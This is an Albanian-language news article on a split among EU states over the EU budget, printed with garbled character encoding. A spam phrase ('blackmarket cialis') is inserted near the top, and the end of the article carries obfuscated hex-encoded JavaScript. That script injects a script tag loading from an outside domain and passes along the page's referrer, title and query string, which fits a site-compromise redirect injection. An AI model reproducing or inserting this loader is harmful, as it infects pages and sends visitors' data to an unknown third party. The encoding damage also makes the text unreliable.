largea_samiti131352827027

Samiti i 15 vendeve anA�tare tA� BE-sA� dA�shmon ndarje rreth buxhetit

blackmarket cialis. NjA� samit i 15 vendeve lidere tA� Bashkimit Evropian po bA�n thirrje pA�r njA� buxhet mA� tA� madh tA� BE-sA�, sesa ai qA� dA�shiron Britania e Madhe dhe disa shtete tA� tjera.

NjA� javA� para samitit tA� BE-sA� pA�r buxhetin, vendimi i sotA�m reflekon nevojA�n pA�r unitet tA� vendeve anA�tare qA� janA� mA� tA� varfA�ra, tA� cilat po llogarisin pA�r njA� pA�rkrahje mA� tA� madhe nga buxheti i BE-sA�, nA� mA�nyrA� qA� ta rikthejnA� rritjen ekonomike.

Britania dhe disa shtete tA� tjera tA� pasura po bA�jnA� thirrje pA�r masa tA� mA�tejme tA� shtrA�ngimit.

NdA�rkohA�, njA� takim qA� ishte caktuar tA� mbahej sonte ndA�rmjet qeverive tA� BE-sA� dhe Parlamentit Evropian, pritet qA� tA� bojkotohet nga Parlamenti.

Presidenti i Parlamentit Evropian, Martin Schulz tha se negociatorA�t e Parlamentit Evropian nuk do tA� marrin pjesA� nA� takimin e sotA�m me KA�shillin, lidhur me buxhetin e vitit 2013, sepse ende nuk ka marrA�veshje ndA�rmjet vendeve anA�tare rreth njA� buxheti suplementar pA�r kA�tA� vit.

PA�rmes njA� deklarate Schulz tha se a�?shkurtimi i buxhetit tA� BE-sA� mund tA� kA�rkohet nA� disa shtete anA�tare, mirA�po njA� gjA� e tillA� A�shtA� absolutisht antiproduktivea�?, njofton agjencia e lajmeve, AP.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}